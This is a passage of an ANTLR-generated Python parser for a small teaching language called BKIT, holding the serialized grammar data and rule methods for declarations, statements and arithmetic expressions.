buf.write(\"\\3\\22\\7\\22\\u00a1\\n\\22\\f\\22\\16\\22\\u00a4\\13\\22\\3\\23\\3\\23\")\n buf.write(\"\\3\\23\\2\\5\\24\\32\\34\\24\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\")\n buf.write(\"\\34\\36 \\\"$\\2\\3\\3\\2\\7\\b\\2\\u00a8\\2(\\3\\2\\2\\2\\4.\\3\\2\\2\\2\\6\")\n buf.write(\"\\61\\3\\2\\2\\2\\bG\\3\\2\\2\\2\\nJ\\3\\2\\2\\2\\fP\\3\\2\\2\\2\\16T\\3\\2\\2\")\n buf.write(\"\\2\\20X\\3\\2\\2\\2\\22b\\3\\2\\2\\2\\24e\\3\\2\\2\\2\\26p\\3\\2\\2\\2\\30\")\n buf.write(\"w\\3\\2\\2\\2\\32y\\3\\2\\2\\2\\34\\u0084\\3\\2\\2\\2\\36\\u0092\\3\\2\\2\")\n buf.write(\"\\2 \\u009b\\3\\2\\2\\2\\\"\\u009d\\3\\2\\2\\2$\\u00a5\\3\\2\\2\\2&)\\5\\4\")\n buf.write(\"\\3\\2\\')\\5\\6\\4\\2(&\\3\\2\\2\\2(\\'\\3\\2\\2\\2)*\\3\\2\\2\\2*(\\3\\2\\2\")\n buf.write(\"\\2*+\\3\\2\\2\\2+,\\3\\2\\2\\2,-\\7\\2\\2\\3-\\3\\3\\2\\2\\2./\\5\\n\\6\\2\")\n buf.write(\"/\\60\\7\\25\\2\\2\\60\\5\\3\\2\\2\\2\\61\\62\\5$\\23\\2\\62\\63\\7\\30\\2\")\n buf.write(\"\\2\\63<\\7\\r\\2\\2\\649\\5\\n\\6\\2\\65\\66\\7\\25\\2\\2\\668\\5\\n\\6\\2\")\n buf.write(\"\\67\\65\\3\\2\\2\\28;\\3\\2\\2\\29\\67\\3\\2\\2\\29:\\3\\2\\2\\2:=\\3\\2\\2\")\n buf.write(\"\\2;9\\3\\2\\2\\2<\\64\\3\\2\\2\\2<=\\3\\2\\2\\2=>\\3\\2\\2\\2>?\\7\\16\\2\")\n buf.write(\"\\2?@\\7\\21\\2\\2@A\\5\\b\\5\\2AB\\7\\22\\2\\2B\\7\\3\\2\\2\\2CF\\5\\4\\3\")\n buf.write(\"\\2DF\\5\\f\\7\\2EC\\3\\2\\2\\2ED\\3\\2\\2\\2FI\\3\\2\\2\\2GE\\3\\2\\2\\2G\")\n buf.write(\"H\\3\\2\\2\\2H\\t\\3\\2\\2\\2IG\\3\\2\\2\\2JK\\5$\\23\\2KL\\5\\\"\\22\\2L\\13\")\n buf.write(\"\\3\\2\\2\\2MQ\\5\\16\\b\\2NQ\\5\\20\\t\\2OQ\\5\\22\\n\\2PM\\3\\2\\2\\2PN\")\n buf.write(\"\\3\\2\\2\\2PO\\3\\2\\2\\2QR\\3\\2\\2\\2RS\\7\\25\\2\\2S\\r\\3\\2\\2\\2TU\\7\")\n buf.write(\"\\30\\2\\2UV\\7\\27\\2\\2VW\\5\\26\\f\\2W\\17\\3\\2\\2\\2XY\\7\\30\\2\\2Y\")\n buf.write(\"]\\7\\r\\2\\2Z\\\\\\5\\24\\13\\2[Z\\3\\2\\2\\2\\\\_\\3\\2\\2\\2][\\3\\2\\2\\2\")\n buf.write(\"]^\\3\\2\\2\\2^`\\3\\2\\2\\2_]\\3\\2\\2\\2`a\\7\\16\\2\\2a\\21\\3\\2\\2\\2\")\n 
buf.write(\"bc\\7\\6\\2\\2cd\\5\\26\\f\\2d\\23\\3\\2\\2\\2ef\\b\\13\\1\\2fg\\5\\26\\f\")\n buf.write(\"\\2gm\\3\\2\\2\\2hi\\f\\3\\2\\2ij\\7\\26\\2\\2jl\\5\\26\\f\\2kh\\3\\2\\2\\2\")\n buf.write(\"lo\\3\\2\\2\\2mk\\3\\2\\2\\2mn\\3\\2\\2\\2n\\25\\3\\2\\2\\2om\\3\\2\\2\\2p\")\n buf.write(\"q\\5\\30\\r\\2q\\27\\3\\2\\2\\2rs\\5\\32\\16\\2st\\7\\t\\2\\2tu\\5\\30\\r\")\n buf.write(\"\\2ux\\3\\2\\2\\2vx\\5\\32\\16\\2wr\\3\\2\\2\\2wv\\3\\2\\2\\2x\\31\\3\\2\\2\")\n buf.write(\"\\2yz\\b\\16\\1\\2z{\\5\\34\\17\\2{\\u0081\\3\\2\\2\\2|}\\f\\4\\2\\2}~\\7\")\n buf.write(\"\\n\\2\\2~\\u0080\\5\\32\\16\\5\\177|\\3\\2\\2\\2\\u0080\\u0083\\3\\2\\2\")\n buf.write(\"\\2\\u0081\\177\\3\\2\\2\\2\\u0081\\u0082\\3\\2\\2\\2\\u0082\\33\\3\\2\")\n buf.write(\"\\2\\2\\u0083\\u0081\\3\\2\\2\\2\\u0084\\u0085\\b\\17\\1\\2\\u0085\\u0086\")\n buf.write(\"\\5 \\21\\2\\u0086\\u008f\\3\\2\\2\\2\\u0087\\u0088\\f\\5\\2\\2\\u0088\")\n buf.write(\"\\u0089\\7\\f\\2\\2\\u0089\\u008e\\5 \\21\\2\\u008a\\u008b\\f\\4\\2\\2\")\n buf.write(\"\\u008b\\u008c\\7\\13\\2\\2\\u008c\\u008e\\5 \\21\\2\\u008d\\u0087\")\n buf.write(\"\\3\\2\\2\\2\\u008d\\u008a\\3\\2\\2\\2\\u008e\\u0091\\3\\2\\2\\2\\u008f\")\n buf.write(\"\\u008d\\3\\2\\2\\2\\u008f\\u0090\\3\\2\\2\\2\\u0090\\35\\3\\2\\2\\2\\u0091\")\n buf.write(\"\\u008f\\3\\2\\2\\2\\u0092\\u0093\\7\\r\\2\\2\\u0093\\u0094\\5\\26\\f\")\n buf.write(\"\\2\\u0094\\u0095\\7\\16\\2\\2\\u0095\\37\\3\\2\\2\\2\\u0096\\u009c\\7\")\n buf.write(\"\\3\\2\\2\\u0097\\u009c\\7\\4\\2\\2\\u0098\\u009c\\7\\30\\2\\2\\u0099\")\n buf.write(\"\\u009c\\5\\20\\t\\2\\u009a\\u009c\\5\\36\\20\\2\\u009b\\u0096\\3\\2\")\n buf.write(\"\\2\\2\\u009b\\u0097\\3\\2\\2\\2\\u009b\\u0098\\3\\2\\2\\2\\u009b\\u0099\")\n buf.write(\"\\3\\2\\2\\2\\u009b\\u009a\\3\\2\\2\\2\\u009c!\\3\\2\\2\\2\\u009d\\u00a2\")\n buf.write(\"\\7\\30\\2\\2\\u009e\\u009f\\7\\26\\2\\2\\u009f\\u00a1\\7\\30\\2\\2\\u00a0\")\n buf.write(\"\\u009e\\3\\2\\2\\2\\u00a1\\u00a4\\3\\2\\2\\2\\u00a2\\u00a0\\3\\2\\2\\2\")\n 
buf.write(\"\\u00a2\\u00a3\\3\\2\\2\\2\\u00a3#\\3\\2\\2\\2\\u00a4\\u00a2\\3\\2\\2\")\n buf.write(\"\\2\\u00a5\\u00a6\\t\\2\\2\\2\\u00a6%\\3\\2\\2\\2\\21(*9<EGP]mw\\u0081\")\n buf.write(\"\\u008d\\u008f\\u009b\\u00a2\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"'+'\", \"'-'\", \n \"'*'\", \"'/'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \n \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \n \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_function_body = 3\n RULE_ids_list_with_type = 4\n RULE_stmt = 5\n RULE_assign_stmt = 6\n RULE_call_stmt = 7\n RULE_ret_stmt = 8\n RULE_exprs_list = 9\n RULE_expr = 10\n RULE_expr0 = 11\n RULE_expr1 = 12\n RULE_expr2 = 13\n RULE_subexpr = 14\n RULE_operand = 15\n RULE_ids_list = 16\n RULE_primitive_type = 17\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"function_body\", \n \"ids_list_with_type\", \"stmt\", \"assign_stmt\", \"call_stmt\", \n \"ret_stmt\", \"exprs_list\", \"expr\", \"expr0\", \"expr1\", \"expr2\", \n \"subexpr\", \"operand\", \"ids_list\", \"primitive_type\" ]\n\n EOF = Token.EOF\n Integer_literal=1\n Float_literal=2\n 
String_literal=3\n RETURN=4\n INT=5\n FLOAT=6\n PLUS_INT=7\n MINUS_INT=8\n STAR_INT=9\n DIV_INT=10\n LEFT_PAREN=11\n RIGHT_PAREN=12\n LEFT_BRACKET=13\n RIGHT_BRACKET=14\n LEFT_BRACE=15\n RIGHT_BRACE=16\n COLON=17\n DOT=18\n SEMI=19\n COMMA=20\n ASSIGN=21\n ID=22\n ILLEGAL_ESCAPE=23\n UNCLOSE_STRING=24\n COMMENT=25\n UNTERMINATED_COMMENT=26\n ERROR_CHAR=27\n WS=28\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 38 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 38\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,0,self._ctx)\n if la_ == 1:\n self.state = 36\n self.var_declare()\n pass\n\n elif la_ == 2:\n self.state = 37\n self.function_declare()\n pass\n\n\n self.state = 40 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not 
(_la==BKITParser.INT or _la==BKITParser.FLOAT):\n break\n\n self.state = 42\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ids_list_with_type(self):\n return self.getTypedRuleContext(BKITParser.Ids_list_with_typeContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 44\n self.ids_list_with_type()\n self.state = 45\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def function_body(self):\n return self.getTypedRuleContext(BKITParser.Function_bodyContext,0)\n\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def 
ids_list_with_type(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_list_with_typeContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_list_with_typeContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 47\n self.primitive_type()\n self.state = 48\n self.match(BKITParser.ID)\n self.state = 49\n self.match(BKITParser.LEFT_PAREN)\n self.state = 58\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.INT or _la==BKITParser.FLOAT:\n self.state = 50\n self.ids_list_with_type()\n self.state = 55\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.SEMI:\n self.state = 51\n self.match(BKITParser.SEMI)\n self.state = 52\n self.ids_list_with_type()\n self.state = 57\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 60\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 61\n self.match(BKITParser.LEFT_BRACE)\n self.state = 62\n self.function_body()\n self.state = 63\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_bodyContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return 
self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_body\n\n\n\n\n def function_body(self):\n\n localctx = BKITParser.Function_bodyContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_function_body)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 69\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.RETURN) | (1 << BKITParser.INT) | (1 << BKITParser.FLOAT) | (1 << BKITParser.ID))) != 0):\n self.state = 67\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT, BKITParser.FLOAT]:\n self.state = 65\n self.var_declare()\n pass\n elif token in [BKITParser.RETURN, BKITParser.ID]:\n self.state = 66\n self.stmt()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 71\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_list_with_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list_with_type\n\n\n\n\n def ids_list_with_type(self):\n\n localctx = BKITParser.Ids_list_with_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_ids_list_with_type)\n 
try:\n self.enterOuterAlt(localctx, 1)\n self.state = 72\n self.primitive_type()\n self.state = 73\n self.ids_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def ret_stmt(self):\n return self.getTypedRuleContext(BKITParser.Ret_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 78\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,6,self._ctx)\n if la_ == 1:\n self.state = 75\n self.assign_stmt()\n pass\n\n elif la_ == 2:\n self.state = 76\n self.call_stmt()\n pass\n\n elif la_ == 3:\n self.state = 77\n self.ret_stmt()\n pass\n\n\n self.state = 80\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return 
self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 82\n self.match(BKITParser.ID)\n self.state = 83\n self.match(BKITParser.ASSIGN)\n self.state = 84\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def exprs_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Exprs_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Exprs_listContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 86\n self.match(BKITParser.ID)\n self.state = 87\n self.match(BKITParser.LEFT_PAREN)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.Integer_literal) | (1 << BKITParser.Float_literal) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.ID))) != 0):\n self.state = 88\n self.exprs_list(0)\n self.state = 93\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n 
self.state = 94\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ret_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ret_stmt\n\n\n\n\n def ret_stmt(self):\n\n localctx = BKITParser.Ret_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_ret_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.RETURN)\n self.state = 97\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Exprs_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def exprs_list(self):\n return self.getTypedRuleContext(BKITParser.Exprs_listContext,0)\n\n\n def COMMA(self):\n return self.getToken(BKITParser.COMMA, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_exprs_list\n\n\n\n def exprs_list(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Exprs_listContext(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 18\n self.enterRecursionRule(localctx, 18, self.RULE_exprs_list, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 100\n self.expr()\n self._ctx.stop = 
self._input.LT(-1)\n self.state = 107\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,8,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Exprs_listContext(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_exprs_list)\n self.state = 102\n if not self.precpred(self._ctx, 1):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 1)\")\n self.state = 103\n self.match(BKITParser.COMMA)\n self.state = 104\n self.expr() \n self.state = 109\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,8,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_expr)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 110\n self.expr0()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr0Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self):\n return 
self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr0\n\n\n\n\n def expr0(self):\n\n localctx = BKITParser.Expr0Context(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_expr0)\n try:\n self.state = 117\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 112\n self.expr1(0)\n self.state = 113\n self.match(BKITParser.PLUS_INT)\n self.state = 114\n self.expr0()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 116\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 24\n self.enterRecursionRule(localctx, 24, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 120\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 127\n 
self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 122\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 123\n self.match(BKITParser.MINUS_INT)\n self.state = 124\n self.expr1(3) \n self.state = 129\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 26\n self.enterRecursionRule(localctx, 26, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 131\n self.operand()\n self._ctx.stop = self._input.LT(-1)\n self.state = 141\n self._errHandler.sync(self)\n _alt = 
self._interp.adaptivePredict(self._input,12,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n self.state = 139\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,11,self._ctx)\n if la_ == 1:\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 133\n if not self.precpred(self._ctx, 3):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 3)\")\n self.state = 134\n self.match(BKITParser.DIV_INT)\n self.state = 135\n self.operand()\n pass\n\n elif la_ == 2:\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 136\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 137\n self.match(BKITParser.STAR_INT)\n self.state = 138\n self.operand()\n pass\n\n \n self.state = 